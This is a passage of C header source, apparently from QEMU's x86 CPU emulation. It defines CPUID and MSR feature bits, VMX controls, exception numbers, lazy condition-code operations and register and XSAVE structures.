CPUID_MCE (1U << 7) #define CPUID_CX8 (1U << 8) #define CPUID_APIC (1U << 9) #define CPUID_SEP (1U << 11) /* sysenter/sysexit */ #define CPUID_MTRR (1U << 12) #define CPUID_PGE (1U << 13) #define CPUID_MCA (1U << 14) #define CPUID_CMOV (1U << 15) #define CPUID_PAT (1U << 16) #define CPUID_PSE36 (1U << 17) #define CPUID_PN (1U << 18) #define CPUID_CLFLUSH (1U << 19) #define CPUID_DTS (1U << 21) #define CPUID_ACPI (1U << 22) #define CPUID_MMX (1U << 23) #define CPUID_FXSR (1U << 24) #define CPUID_SSE (1U << 25) #define CPUID_SSE2 (1U << 26) #define CPUID_SS (1U << 27) #define CPUID_HT (1U << 28) #define CPUID_TM (1U << 29) #define CPUID_IA64 (1U << 30) #define CPUID_PBE (1U << 31) #define CPUID_EXT_SSE3 (1U << 0) #define CPUID_EXT_PCLMULQDQ (1U << 1) #define CPUID_EXT_DTES64 (1U << 2) #define CPUID_EXT_MONITOR (1U << 3) #define CPUID_EXT_DSCPL (1U << 4) #define CPUID_EXT_VMX (1U << 5) #define CPUID_EXT_SMX (1U << 6) #define CPUID_EXT_EST (1U << 7) #define CPUID_EXT_TM2 (1U << 8) #define CPUID_EXT_SSSE3 (1U << 9) #define CPUID_EXT_CID (1U << 10) #define CPUID_EXT_FMA (1U << 12) #define CPUID_EXT_CX16 (1U << 13) #define CPUID_EXT_XTPR (1U << 14) #define CPUID_EXT_PDCM (1U << 15) #define CPUID_EXT_PCID (1U << 17) #define CPUID_EXT_DCA (1U << 18) #define CPUID_EXT_SSE41 (1U << 19) #define CPUID_EXT_SSE42 (1U << 20) #define CPUID_EXT_X2APIC (1U << 21) #define CPUID_EXT_MOVBE (1U << 22) #define CPUID_EXT_POPCNT (1U << 23) #define CPUID_EXT_TSC_DEADLINE_TIMER (1U << 24) #define CPUID_EXT_AES (1U << 25) #define CPUID_EXT_XSAVE (1U << 26) #define CPUID_EXT_OSXSAVE (1U << 27) #define CPUID_EXT_AVX (1U << 28) #define CPUID_EXT_F16C (1U << 29) #define CPUID_EXT_RDRAND (1U << 30) #define CPUID_EXT_HYPERVISOR (1U << 31) #define CPUID_EXT2_FPU (1U << 0) #define CPUID_EXT2_VME (1U << 1) #define CPUID_EXT2_DE (1U << 2) #define CPUID_EXT2_PSE (1U << 3) #define CPUID_EXT2_TSC (1U << 4) #define CPUID_EXT2_MSR (1U << 5) #define CPUID_EXT2_PAE (1U << 6) #define CPUID_EXT2_MCE (1U << 7) #define CPUID_EXT2_CX8 (1U << 8) #define CPUID_EXT2_APIC (1U << 9) #define CPUID_EXT2_SYSCALL (1U << 11) #define CPUID_EXT2_MTRR (1U << 12) #define CPUID_EXT2_PGE (1U << 13) #define CPUID_EXT2_MCA (1U << 14) #define CPUID_EXT2_CMOV (1U << 15) #define CPUID_EXT2_PAT (1U << 16) #define CPUID_EXT2_PSE36 (1U << 17) #define CPUID_EXT2_MP (1U << 19) #define CPUID_EXT2_NX (1U << 20) #define CPUID_EXT2_MMXEXT (1U << 22) #define CPUID_EXT2_MMX (1U << 23) #define CPUID_EXT2_FXSR (1U << 24) #define CPUID_EXT2_FFXSR (1U << 25) #define CPUID_EXT2_PDPE1GB (1U << 26) #define CPUID_EXT2_RDTSCP (1U << 27) #define CPUID_EXT2_LM (1U << 29) #define CPUID_EXT2_3DNOWEXT (1U << 30) #define CPUID_EXT2_3DNOW (1U << 31) /* CPUID[8000_0001].EDX bits that are aliase of CPUID[1].EDX bits on AMD CPUs */ #define CPUID_EXT2_AMD_ALIASES (CPUID_EXT2_FPU | CPUID_EXT2_VME | \ CPUID_EXT2_DE | CPUID_EXT2_PSE | \ CPUID_EXT2_TSC | CPUID_EXT2_MSR | \ CPUID_EXT2_PAE | CPUID_EXT2_MCE | \ CPUID_EXT2_CX8 | CPUID_EXT2_APIC | \ CPUID_EXT2_MTRR | CPUID_EXT2_PGE | \ CPUID_EXT2_MCA | CPUID_EXT2_CMOV | \ CPUID_EXT2_PAT | CPUID_EXT2_PSE36 | \ CPUID_EXT2_MMX | CPUID_EXT2_FXSR) #define CPUID_EXT3_LAHF_LM (1U << 0) #define CPUID_EXT3_CMP_LEG (1U << 1) #define CPUID_EXT3_SVM (1U << 2) #define CPUID_EXT3_EXTAPIC (1U << 3) #define CPUID_EXT3_CR8LEG (1U << 4) #define CPUID_EXT3_ABM (1U << 5) #define CPUID_EXT3_SSE4A (1U << 6) #define CPUID_EXT3_MISALIGNSSE (1U << 7) #define CPUID_EXT3_3DNOWPREFETCH (1U << 8) #define CPUID_EXT3_OSVW (1U << 9) #define CPUID_EXT3_IBS (1U << 10) #define 
CPUID_EXT3_XOP (1U << 11) #define CPUID_EXT3_SKINIT (1U << 12) #define CPUID_EXT3_WDT (1U << 13) #define CPUID_EXT3_LWP (1U << 15) #define CPUID_EXT3_FMA4 (1U << 16) #define CPUID_EXT3_TCE (1U << 17) #define CPUID_EXT3_NODEID (1U << 19) #define CPUID_EXT3_TBM (1U << 21) #define CPUID_EXT3_TOPOEXT (1U << 22) #define CPUID_EXT3_PERFCORE (1U << 23) #define CPUID_EXT3_PERFNB (1U << 24) #define CPUID_SVM_NPT (1U << 0) #define CPUID_SVM_LBRV (1U << 1) #define CPUID_SVM_SVMLOCK (1U << 2) #define CPUID_SVM_NRIPSAVE (1U << 3) #define CPUID_SVM_TSCSCALE (1U << 4) #define CPUID_SVM_VMCBCLEAN (1U << 5) #define CPUID_SVM_FLUSHASID (1U << 6) #define CPUID_SVM_DECODEASSIST (1U << 7) #define CPUID_SVM_PAUSEFILTER (1U << 10) #define CPUID_SVM_PFTHRESHOLD (1U << 12) /* Support RDFSBASE/RDGSBASE/WRFSBASE/WRGSBASE */ #define CPUID_7_0_EBX_FSGSBASE (1U << 0) /* 1st Group of Advanced Bit Manipulation Extensions */ #define CPUID_7_0_EBX_BMI1 (1U << 3) /* Hardware Lock Elision */ #define CPUID_7_0_EBX_HLE (1U << 4) /* Intel Advanced Vector Extensions 2 */ #define CPUID_7_0_EBX_AVX2 (1U << 5) /* Supervisor-mode Execution Prevention */ #define CPUID_7_0_EBX_SMEP (1U << 7) /* 2nd Group of Advanced Bit Manipulation Extensions */ #define CPUID_7_0_EBX_BMI2 (1U << 8) /* Enhanced REP MOVSB/STOSB */ #define CPUID_7_0_EBX_ERMS (1U << 9) /* Invalidate Process-Context Identifier */ #define CPUID_7_0_EBX_INVPCID (1U << 10) /* Restricted Transactional Memory */ #define CPUID_7_0_EBX_RTM (1U << 11) /* Memory Protection Extension */ #define CPUID_7_0_EBX_MPX (1U << 14) /* AVX-512 Foundation */ #define CPUID_7_0_EBX_AVX512F (1U << 16) /* AVX-512 Doubleword & Quadword Instruction */ #define CPUID_7_0_EBX_AVX512DQ (1U << 17) /* Read Random SEED */ #define CPUID_7_0_EBX_RDSEED (1U << 18) /* ADCX and ADOX instructions */ #define CPUID_7_0_EBX_ADX (1U << 19) /* Supervisor Mode Access Prevention */ #define CPUID_7_0_EBX_SMAP (1U << 20) /* AVX-512 Integer Fused Multiply Add */ #define CPUID_7_0_EBX_AVX512IFMA (1U << 21) /* Persistent Commit */ #define CPUID_7_0_EBX_PCOMMIT (1U << 22) /* Flush a Cache Line Optimized */ #define CPUID_7_0_EBX_CLFLUSHOPT (1U << 23) /* Cache Line Write Back */ #define CPUID_7_0_EBX_CLWB (1U << 24) /* Intel Processor Trace */ #define CPUID_7_0_EBX_INTEL_PT (1U << 25) /* AVX-512 Prefetch */ #define CPUID_7_0_EBX_AVX512PF (1U << 26) /* AVX-512 Exponential and Reciprocal */ #define CPUID_7_0_EBX_AVX512ER (1U << 27) /* AVX-512 Conflict Detection */ #define CPUID_7_0_EBX_AVX512CD (1U << 28) /* SHA1/SHA256 Instruction Extensions */ #define CPUID_7_0_EBX_SHA_NI (1U << 29) /* AVX-512 Byte and Word Instructions */ #define CPUID_7_0_EBX_AVX512BW (1U << 30) /* AVX-512 Vector Length Extensions */ #define CPUID_7_0_EBX_AVX512VL (1U << 31) /* AVX-512 Vector Byte Manipulation Instruction */ #define CPUID_7_0_ECX_AVX512_VBMI (1U << 1) /* User-Mode Instruction Prevention */ #define CPUID_7_0_ECX_UMIP (1U << 2) /* Protection Keys for User-mode Pages */ #define CPUID_7_0_ECX_PKU (1U << 3) /* OS Enable Protection Keys */ #define CPUID_7_0_ECX_OSPKE (1U << 4) /* UMONITOR/UMWAIT/TPAUSE Instructions */ #define CPUID_7_0_ECX_WAITPKG (1U << 5) /* Additional AVX-512 Vector Byte Manipulation Instruction */ #define CPUID_7_0_ECX_AVX512_VBMI2 (1U << 6) /* Galois Field New Instructions */ #define CPUID_7_0_ECX_GFNI (1U << 8) /* Vector AES Instructions */ #define CPUID_7_0_ECX_VAES (1U << 9) /* Carry-Less Multiplication Quadword */ #define CPUID_7_0_ECX_VPCLMULQDQ (1U << 10) /* Vector Neural Network Instructions */ #define 
CPUID_7_0_ECX_AVX512VNNI (1U << 11) /* Support for VPOPCNT[B,W] and VPSHUFBITQMB */ #define CPUID_7_0_ECX_AVX512BITALG (1U << 12) /* POPCNT for vectors of DW/QW */ #define CPUID_7_0_ECX_AVX512_VPOPCNTDQ (1U << 14) /* 5-level Page Tables */ #define CPUID_7_0_ECX_LA57 (1U << 16) /* Read Processor ID */ #define CPUID_7_0_ECX_RDPID (1U << 22) /* Cache Line Demote Instruction */ #define CPUID_7_0_ECX_CLDEMOTE (1U << 25) /* Move Doubleword as Direct Store Instruction */ #define CPUID_7_0_ECX_MOVDIRI (1U << 27) /* Move 64 Bytes as Direct Store Instruction */ #define CPUID_7_0_ECX_MOVDIR64B (1U << 28) /* AVX512 Neural Network Instructions */ #define CPUID_7_0_EDX_AVX512_4VNNIW (1U << 2) /* AVX512 Multiply Accumulation Single Precision */ #define CPUID_7_0_EDX_AVX512_4FMAPS (1U << 3) /* Speculation Control */ #define CPUID_7_0_EDX_SPEC_CTRL (1U << 26) /* Single Thread Indirect Branch Predictors */ #define CPUID_7_0_EDX_STIBP (1U << 27) /* Arch Capabilities */ #define CPUID_7_0_EDX_ARCH_CAPABILITIES (1U << 29) /* Core Capability */ #define CPUID_7_0_EDX_CORE_CAPABILITY (1U << 30) /* Speculative Store Bypass Disable */ #define CPUID_7_0_EDX_SPEC_CTRL_SSBD (1U << 31) /* AVX512 BFloat16 Instruction */ #define CPUID_7_1_EAX_AVX512_BF16 (1U << 5) /* CLZERO instruction */ #define CPUID_8000_0008_EBX_CLZERO (1U << 0) /* Always save/restore FP error pointers */ #define CPUID_8000_0008_EBX_XSAVEERPTR (1U << 2) /* Write back and do not invalidate cache */ #define CPUID_8000_0008_EBX_WBNOINVD (1U << 9) /* Indirect Branch Prediction Barrier */ #define CPUID_8000_0008_EBX_IBPB (1U << 12) /* Single Thread Indirect Branch Predictors */ #define CPUID_8000_0008_EBX_STIBP (1U << 15) #define CPUID_XSAVE_XSAVEOPT (1U << 0) #define CPUID_XSAVE_XSAVEC (1U << 1) #define CPUID_XSAVE_XGETBV1 (1U << 2) #define CPUID_XSAVE_XSAVES (1U << 3) #define CPUID_6_EAX_ARAT (1U << 2) /* CPUID[0x80000007].EDX flags: */ #define CPUID_APM_INVTSC (1U << 8) #define CPUID_VENDOR_SZ 12 #define CPUID_VENDOR_INTEL_1 0x756e6547 /* "Genu" */ #define CPUID_VENDOR_INTEL_2 0x49656e69 /* "ineI" */ #define CPUID_VENDOR_INTEL_3 0x6c65746e /* "ntel" */ #define CPUID_VENDOR_INTEL "GenuineIntel" #define CPUID_VENDOR_AMD_1 0x68747541 /* "Auth" */ #define CPUID_VENDOR_AMD_2 0x69746e65 /* "enti" */ #define CPUID_VENDOR_AMD_3 0x444d4163 /* "cAMD" */ #define CPUID_VENDOR_AMD "AuthenticAMD" #define CPUID_VENDOR_VIA "CentaurHauls" #define CPUID_VENDOR_HYGON "HygonGenuine" #define IS_INTEL_CPU(env) ((env)->cpuid_vendor1 == CPUID_VENDOR_INTEL_1 && \ (env)->cpuid_vendor2 == CPUID_VENDOR_INTEL_2 && \ (env)->cpuid_vendor3 == CPUID_VENDOR_INTEL_3) #define IS_AMD_CPU(env) ((env)->cpuid_vendor1 == CPUID_VENDOR_AMD_1 && \ (env)->cpuid_vendor2 == CPUID_VENDOR_AMD_2 && \ (env)->cpuid_vendor3 == CPUID_VENDOR_AMD_3) #define CPUID_MWAIT_IBE (1U << 1) /* Interrupts can exit capability */ #define CPUID_MWAIT_EMX (1U << 0) /* enumeration supported */ /* CPUID[0xB].ECX level types */ #define CPUID_TOPOLOGY_LEVEL_INVALID (0U << 8) #define CPUID_TOPOLOGY_LEVEL_SMT (1U << 8) #define CPUID_TOPOLOGY_LEVEL_CORE (2U << 8) #define CPUID_TOPOLOGY_LEVEL_DIE (5U << 8) /* MSR Feature Bits */ #define MSR_ARCH_CAP_RDCL_NO (1U << 0) #define MSR_ARCH_CAP_IBRS_ALL (1U << 1) #define MSR_ARCH_CAP_RSBA (1U << 2) #define MSR_ARCH_CAP_SKIP_L1DFL_VMENTRY (1U << 3) #define MSR_ARCH_CAP_SSB_NO (1U << 4) #define MSR_ARCH_CAP_MDS_NO (1U << 5) #define MSR_ARCH_CAP_PSCHANGE_MC_NO (1U << 6) #define MSR_ARCH_CAP_TSX_CTRL_MSR (1U << 7) #define MSR_ARCH_CAP_TAA_NO (1U << 8) #define MSR_CORE_CAP_SPLIT_LOCK_DETECT 
(1U << 5) /* VMX MSR features */ #define MSR_VMX_BASIC_VMCS_REVISION_MASK 0x7FFFFFFFull #define MSR_VMX_BASIC_VMXON_REGION_SIZE_MASK (0x00001FFFull << 32) #define MSR_VMX_BASIC_VMCS_MEM_TYPE_MASK (0x003C0000ull << 32) #define MSR_VMX_BASIC_DUAL_MONITOR (1ULL << 49) #define MSR_VMX_BASIC_INS_OUTS (1ULL << 54) #define MSR_VMX_BASIC_TRUE_CTLS (1ULL << 55) #define MSR_VMX_MISC_PREEMPTION_TIMER_SHIFT_MASK 0x1Full #define MSR_VMX_MISC_STORE_LMA (1ULL << 5) #define MSR_VMX_MISC_ACTIVITY_HLT (1ULL << 6) #define MSR_VMX_MISC_ACTIVITY_SHUTDOWN (1ULL << 7) #define MSR_VMX_MISC_ACTIVITY_WAIT_SIPI (1ULL << 8) #define MSR_VMX_MISC_MAX_MSR_LIST_SIZE_MASK 0x0E000000ull #define MSR_VMX_MISC_VMWRITE_VMEXIT (1ULL << 29) #define MSR_VMX_MISC_ZERO_LEN_INJECT (1ULL << 30) #define MSR_VMX_EPT_EXECONLY (1ULL << 0) #define MSR_VMX_EPT_PAGE_WALK_LENGTH_4 (1ULL << 6) #define MSR_VMX_EPT_PAGE_WALK_LENGTH_5 (1ULL << 7) #define MSR_VMX_EPT_UC (1ULL << 8) #define MSR_VMX_EPT_WB (1ULL << 14) #define MSR_VMX_EPT_2MB (1ULL << 16) #define MSR_VMX_EPT_1GB (1ULL << 17) #define MSR_VMX_EPT_INVEPT (1ULL << 20) #define MSR_VMX_EPT_AD_BITS (1ULL << 21) #define MSR_VMX_EPT_ADVANCED_VMEXIT_INFO (1ULL << 22) #define MSR_VMX_EPT_INVEPT_SINGLE_CONTEXT (1ULL << 25) #define MSR_VMX_EPT_INVEPT_ALL_CONTEXT (1ULL << 26) #define MSR_VMX_EPT_INVVPID (1ULL << 32) #define MSR_VMX_EPT_INVVPID_SINGLE_ADDR (1ULL << 40) #define MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT (1ULL << 41) #define MSR_VMX_EPT_INVVPID_ALL_CONTEXT (1ULL << 42) #define MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT_NOGLOBALS (1ULL << 43) #define MSR_VMX_VMFUNC_EPT_SWITCHING (1ULL << 0) /* VMX controls */ #define VMX_CPU_BASED_VIRTUAL_INTR_PENDING 0x00000004 #define VMX_CPU_BASED_USE_TSC_OFFSETING 0x00000008 #define VMX_CPU_BASED_HLT_EXITING 0x00000080 #define VMX_CPU_BASED_INVLPG_EXITING 0x00000200 #define VMX_CPU_BASED_MWAIT_EXITING 0x00000400 #define VMX_CPU_BASED_RDPMC_EXITING 0x00000800 #define VMX_CPU_BASED_RDTSC_EXITING 0x00001000 #define VMX_CPU_BASED_CR3_LOAD_EXITING 0x00008000 #define VMX_CPU_BASED_CR3_STORE_EXITING 0x00010000 #define VMX_CPU_BASED_CR8_LOAD_EXITING 0x00080000 #define VMX_CPU_BASED_CR8_STORE_EXITING 0x00100000 #define VMX_CPU_BASED_TPR_SHADOW 0x00200000 #define VMX_CPU_BASED_VIRTUAL_NMI_PENDING 0x00400000 #define VMX_CPU_BASED_MOV_DR_EXITING 0x00800000 #define VMX_CPU_BASED_UNCOND_IO_EXITING 0x01000000 #define VMX_CPU_BASED_USE_IO_BITMAPS 0x02000000 #define VMX_CPU_BASED_MONITOR_TRAP_FLAG 0x08000000 #define VMX_CPU_BASED_USE_MSR_BITMAPS 0x10000000 #define VMX_CPU_BASED_MONITOR_EXITING 0x20000000 #define VMX_CPU_BASED_PAUSE_EXITING 0x40000000 #define VMX_CPU_BASED_ACTIVATE_SECONDARY_CONTROLS 0x80000000 #define VMX_SECONDARY_EXEC_VIRTUALIZE_APIC_ACCESSES 0x00000001 #define VMX_SECONDARY_EXEC_ENABLE_EPT 0x00000002 #define VMX_SECONDARY_EXEC_DESC 0x00000004 #define VMX_SECONDARY_EXEC_RDTSCP 0x00000008 #define VMX_SECONDARY_EXEC_VIRTUALIZE_X2APIC_MODE 0x00000010 #define VMX_SECONDARY_EXEC_ENABLE_VPID 0x00000020 #define VMX_SECONDARY_EXEC_WBINVD_EXITING 0x00000040 #define VMX_SECONDARY_EXEC_UNRESTRICTED_GUEST 0x00000080 #define VMX_SECONDARY_EXEC_APIC_REGISTER_VIRT 0x00000100 #define VMX_SECONDARY_EXEC_VIRTUAL_INTR_DELIVERY 0x00000200 #define VMX_SECONDARY_EXEC_PAUSE_LOOP_EXITING 0x00000400 #define VMX_SECONDARY_EXEC_RDRAND_EXITING 0x00000800 #define VMX_SECONDARY_EXEC_ENABLE_INVPCID 0x00001000 #define VMX_SECONDARY_EXEC_ENABLE_VMFUNC 0x00002000 #define VMX_SECONDARY_EXEC_SHADOW_VMCS 0x00004000 #define VMX_SECONDARY_EXEC_ENCLS_EXITING 0x00008000 #define 
VMX_SECONDARY_EXEC_RDSEED_EXITING 0x00010000 #define VMX_SECONDARY_EXEC_ENABLE_PML 0x00020000 #define VMX_SECONDARY_EXEC_XSAVES 0x00100000 #define VMX_PIN_BASED_EXT_INTR_MASK 0x00000001 #define VMX_PIN_BASED_NMI_EXITING 0x00000008 #define VMX_PIN_BASED_VIRTUAL_NMIS 0x00000020 #define VMX_PIN_BASED_VMX_PREEMPTION_TIMER 0x00000040 #define VMX_PIN_BASED_POSTED_INTR 0x00000080 #define VMX_VM_EXIT_SAVE_DEBUG_CONTROLS 0x00000004 #define VMX_VM_EXIT_HOST_ADDR_SPACE_SIZE 0x00000200 #define VMX_VM_EXIT_LOAD_IA32_PERF_GLOBAL_CTRL 0x00001000 #define VMX_VM_EXIT_ACK_INTR_ON_EXIT 0x00008000 #define VMX_VM_EXIT_SAVE_IA32_PAT 0x00040000 #define VMX_VM_EXIT_LOAD_IA32_PAT 0x00080000 #define VMX_VM_EXIT_SAVE_IA32_EFER 0x00100000 #define VMX_VM_EXIT_LOAD_IA32_EFER 0x00200000 #define VMX_VM_EXIT_SAVE_VMX_PREEMPTION_TIMER 0x00400000 #define VMX_VM_EXIT_CLEAR_BNDCFGS 0x00800000 #define VMX_VM_EXIT_PT_CONCEAL_PIP 0x01000000 #define VMX_VM_EXIT_CLEAR_IA32_RTIT_CTL 0x02000000 #define VMX_VM_ENTRY_LOAD_DEBUG_CONTROLS 0x00000004 #define VMX_VM_ENTRY_IA32E_MODE 0x00000200 #define VMX_VM_ENTRY_SMM 0x00000400 #define VMX_VM_ENTRY_DEACT_DUAL_MONITOR 0x00000800 #define VMX_VM_ENTRY_LOAD_IA32_PERF_GLOBAL_CTRL 0x00002000 #define VMX_VM_ENTRY_LOAD_IA32_PAT 0x00004000 #define VMX_VM_ENTRY_LOAD_IA32_EFER 0x00008000 #define VMX_VM_ENTRY_LOAD_BNDCFGS 0x00010000 #define VMX_VM_ENTRY_PT_CONCEAL_PIP 0x00020000 #define VMX_VM_ENTRY_LOAD_IA32_RTIT_CTL 0x00040000 /* Supported Hyper-V Enlightenments */ #define HYPERV_FEAT_RELAXED 0 #define HYPERV_FEAT_VAPIC 1 #define HYPERV_FEAT_TIME 2 #define HYPERV_FEAT_CRASH 3 #define HYPERV_FEAT_RESET 4 #define HYPERV_FEAT_VPINDEX 5 #define HYPERV_FEAT_RUNTIME 6 #define HYPERV_FEAT_SYNIC 7 #define HYPERV_FEAT_STIMER 8 #define HYPERV_FEAT_FREQUENCIES 9 #define HYPERV_FEAT_REENLIGHTENMENT 10 #define HYPERV_FEAT_TLBFLUSH 11 #define HYPERV_FEAT_EVMCS 12 #define HYPERV_FEAT_IPI 13 #define HYPERV_FEAT_STIMER_DIRECT 14 #ifndef HYPERV_SPINLOCK_NEVER_RETRY #define HYPERV_SPINLOCK_NEVER_RETRY 0xFFFFFFFF #endif #define EXCP00_DIVZ 0 #define EXCP01_DB 1 #define EXCP02_NMI 2 #define EXCP03_INT3 3 #define EXCP04_INTO 4 #define EXCP05_BOUND 5 #define EXCP06_ILLOP 6 #define EXCP07_PREX 7 #define EXCP08_DBLE 8 #define EXCP09_XERR 9 #define EXCP0A_TSS 10 #define EXCP0B_NOSEG 11 #define EXCP0C_STACK 12 #define EXCP0D_GPF 13 #define EXCP0E_PAGE 14 #define EXCP10_COPR 16 #define EXCP11_ALGN 17 #define EXCP12_MCHK 18 #define EXCP_VMEXIT 0x100 /* only for system emulation */ #define EXCP_SYSCALL 0x101 /* only for user emulation */ #define EXCP_VSYSCALL 0x102 /* only for user emulation */ /* i386-specific interrupt pending bits. */ #define CPU_INTERRUPT_POLL CPU_INTERRUPT_TGT_EXT_1 #define CPU_INTERRUPT_SMI CPU_INTERRUPT_TGT_EXT_2 #define CPU_INTERRUPT_NMI CPU_INTERRUPT_TGT_EXT_3 #define CPU_INTERRUPT_MCE CPU_INTERRUPT_TGT_EXT_4 #define CPU_INTERRUPT_VIRQ CPU_INTERRUPT_TGT_INT_0 #define CPU_INTERRUPT_SIPI CPU_INTERRUPT_TGT_INT_1 #define CPU_INTERRUPT_TPR CPU_INTERRUPT_TGT_INT_2 /* Use a clearer name for this. */ #define CPU_INTERRUPT_INIT CPU_INTERRUPT_RESET /* Instead of computing the condition codes after each x86 instruction, * QEMU just stores one operand (called CC_SRC), the result * (called CC_DST) and the type of operation (called CC_OP). When the * condition codes are needed, the condition codes can be calculated * using this information. Condition codes are not generated if they * are only needed for conditional branches. 
*/ typedef enum { CC_OP_DYNAMIC, /* must use dynamic code to get cc_op */ CC_OP_EFLAGS, /* all cc are explicitly computed, CC_SRC = flags */ CC_OP_MULB, /* modify all flags, C, O = (CC_SRC != 0) */ CC_OP_MULW, CC_OP_MULL, CC_OP_MULQ, CC_OP_ADDB, /* modify all flags, CC_DST = res, CC_SRC = src1 */ CC_OP_ADDW, CC_OP_ADDL, CC_OP_ADDQ, CC_OP_ADCB, /* modify all flags, CC_DST = res, CC_SRC = src1 */ CC_OP_ADCW, CC_OP_ADCL, CC_OP_ADCQ, CC_OP_SUBB, /* modify all flags, CC_DST = res, CC_SRC = src1 */ CC_OP_SUBW, CC_OP_SUBL, CC_OP_SUBQ, CC_OP_SBBB, /* modify all flags, CC_DST = res, CC_SRC = src1 */ CC_OP_SBBW, CC_OP_SBBL, CC_OP_SBBQ, CC_OP_LOGICB, /* modify all flags, CC_DST = res */ CC_OP_LOGICW, CC_OP_LOGICL, CC_OP_LOGICQ, CC_OP_INCB, /* modify all flags except, CC_DST = res, CC_SRC = C */ CC_OP_INCW, CC_OP_INCL, CC_OP_INCQ, CC_OP_DECB, /* modify all flags except, CC_DST = res, CC_SRC = C */ CC_OP_DECW, CC_OP_DECL, CC_OP_DECQ, CC_OP_SHLB, /* modify all flags, CC_DST = res, CC_SRC.msb = C */ CC_OP_SHLW, CC_OP_SHLL, CC_OP_SHLQ, CC_OP_SARB, /* modify all flags, CC_DST = res, CC_SRC.lsb = C */ CC_OP_SARW, CC_OP_SARL, CC_OP_SARQ, CC_OP_BMILGB, /* Z,S via CC_DST, C = SRC==0; O=0; P,A undefined */ CC_OP_BMILGW, CC_OP_BMILGL, CC_OP_BMILGQ, CC_OP_ADCX, /* CC_DST = C, CC_SRC = rest. */ CC_OP_ADOX, /* CC_DST = O, CC_SRC = rest. */ CC_OP_ADCOX, /* CC_DST = C, CC_SRC2 = O, CC_SRC = rest. */ CC_OP_CLR, /* Z set, all other flags clear. */ CC_OP_POPCNT, /* Z via CC_SRC, all other flags clear. */ CC_OP_NB, } CCOp; typedef struct SegmentCache { uint32_t selector; target_ulong base; uint32_t limit; uint32_t flags; } SegmentCache; #define MMREG_UNION(n, bits) \ union n { \ uint8_t _b_##n[(bits)/8]; \ uint16_t _w_##n[(bits)/16]; \ uint32_t _l_##n[(bits)/32]; \ uint64_t _q_##n[(bits)/64]; \ float32 _s_##n[(bits)/32]; \ float64 _d_##n[(bits)/64]; \ } typedef union { uint8_t _b[16]; uint16_t _w[8]; uint32_t _l[4]; uint64_t _q[2]; float32 _s[4]; float64 _d[2]; } XMMReg; typedef union { uint8_t _b[32]; uint16_t _w[16]; uint32_t _l[8]; uint64_t _q[4]; float32 _s[8]; float64 _d[4]; } YMMReg; #if 0 typedef union { uint8_t _b[64]; uint16_t _w[32]; uint32_t _l[16]; uint64_t _q[8]; float32 _s[16]; float64 _d[8]; } ZMMReg; #endif typedef MMREG_UNION(ZMMReg, 512) ZMMReg; typedef MMREG_UNION(MMXReg, 64) MMXReg; typedef struct BNDReg { uint64_t lb; uint64_t ub; } BNDReg; typedef struct BNDCSReg { uint64_t cfgu; uint64_t sts; } BNDCSReg; #define BNDCFG_ENABLE 1ULL #define BNDCFG_BNDPRESERVE 2ULL #define BNDCFG_BDIR_MASK TARGET_PAGE_MASK #ifdef HOST_WORDS_BIGENDIAN #define ZMM_B(n) _b_ZMMReg[63 - (n)] #define ZMM_W(n) _w_ZMMReg[31 - (n)] #define ZMM_L(n) _l_ZMMReg[15 - (n)] #define ZMM_S(n) _s_ZMMReg[15 - (n)] #define ZMM_Q(n) _q_ZMMReg[7 - (n)] #define ZMM_D(n) _d_ZMMReg[7 - (n)] #define MMX_B(n) _b_MMXReg[7 - (n)] #define MMX_W(n) _w_MMXReg[3 - (n)] #define MMX_L(n) _l_MMXReg[1 - (n)] #define MMX_S(n) _s_MMXReg[1 - (n)] #else #define ZMM_B(n) _b_ZMMReg[n] #define ZMM_W(n) _w_ZMMReg[n] #define ZMM_L(n) _l_ZMMReg[n] #define ZMM_S(n) _s_ZMMReg[n] #define ZMM_Q(n) _q_ZMMReg[n] #define ZMM_D(n) _d_ZMMReg[n] #define MMX_B(n) _b_MMXReg[n] #define MMX_W(n) _w_MMXReg[n] #define MMX_L(n) _l_MMXReg[n] #define MMX_S(n) _s_MMXReg[n] #endif #define MMX_Q(n) _q_MMXReg[n] typedef union { floatx80 QEMU_ALIGN(16, d); MMXReg mmx; } FPReg; typedef struct { uint64_t base; uint64_t mask; } MTRRVar; #define CPU_NB_REGS64 16 #define CPU_NB_REGS32 8 #ifdef TARGET_X86_64 #define CPU_NB_REGS CPU_NB_REGS64 #else #define CPU_NB_REGS CPU_NB_REGS32 #endif 
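/*
 * Illustrative sketch, not part of the original source: it shows how the
 * lazy condition-code scheme described above (CC_OP/CC_SRC/CC_DST) can be
 * materialized on demand for one case.  For CC_OP_ADDB, CC_DST holds the
 * 8-bit result and CC_SRC holds src1, so the second operand is recovered
 * as CC_DST - CC_SRC and the flags are recomputed from scratch.  The
 * function name is hypothetical and PF/AF are omitted for brevity; the
 * real helpers live in cc_helper.c / cc_helper_template.h.
 */
#if 0
static uint32_t sketch_compute_flags_addb(uint8_t dst, uint8_t src1)
{
    uint8_t src2 = dst - src1;              /* reconstruct second operand */
    uint32_t cf = dst < src1;               /* unsigned carry out == CC_C */
    uint32_t zf = (dst == 0) * CC_Z;
    uint32_t sf = (dst >> 7) * CC_S;
    /* signed overflow: both operands share a sign that differs from res */
    uint32_t of = ((src1 ^ dst) & (src2 ^ dst) & 0x80) ? CC_O : 0;
    return cf | zf | sf | of;
}
#endif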
#define MAX_FIXED_COUNTERS 3 #define MAX_GP_COUNTERS (MSR_IA32_PERF_STATUS - MSR_P6_EVNTSEL0) #define TARGET_INSN_START_EXTRA_WORDS 1 #define NB_OPMASK_REGS 8 /* CPU can't have 0xFFFFFFFF APIC ID, use that value to distinguish * that APIC ID hasn't been set yet */ #define UNASSIGNED_APIC_ID 0xFFFFFFFF typedef union X86LegacyXSaveArea { struct { uint16_t fcw; uint16_t fsw; uint8_t ftw; uint8_t reserved; uint16_t fpop; uint64_t fpip; uint64_t fpdp; uint32_t mxcsr; uint32_t mxcsr_mask; FPReg fpregs[8]; uint8_t xmm_regs[16][16]; }; uint8_t data[512]; } X86LegacyXSaveArea; typedef struct X86XSaveHeader { uint64_t xstate_bv; uint64_t xcomp_bv; uint64_t reserve0; uint8_t reserved[40]; } X86XSaveHeader; /* Ext. save area 2: AVX State */ typedef struct XSaveAVX { uint8_t ymmh[16][16]; } XSaveAVX; /* Ext. save area 3: BNDREG */ typedef struct XSaveBNDREG { BNDReg bnd_regs[4]; } XSaveBNDREG; /* Ext. save area 4: BNDCSR */ typedef union XSaveBNDCSR { BNDCSReg bndcsr; uint8_t data[64]; } XSaveBNDCSR; /* Ext. save area 5: Opmask */ typedef struct 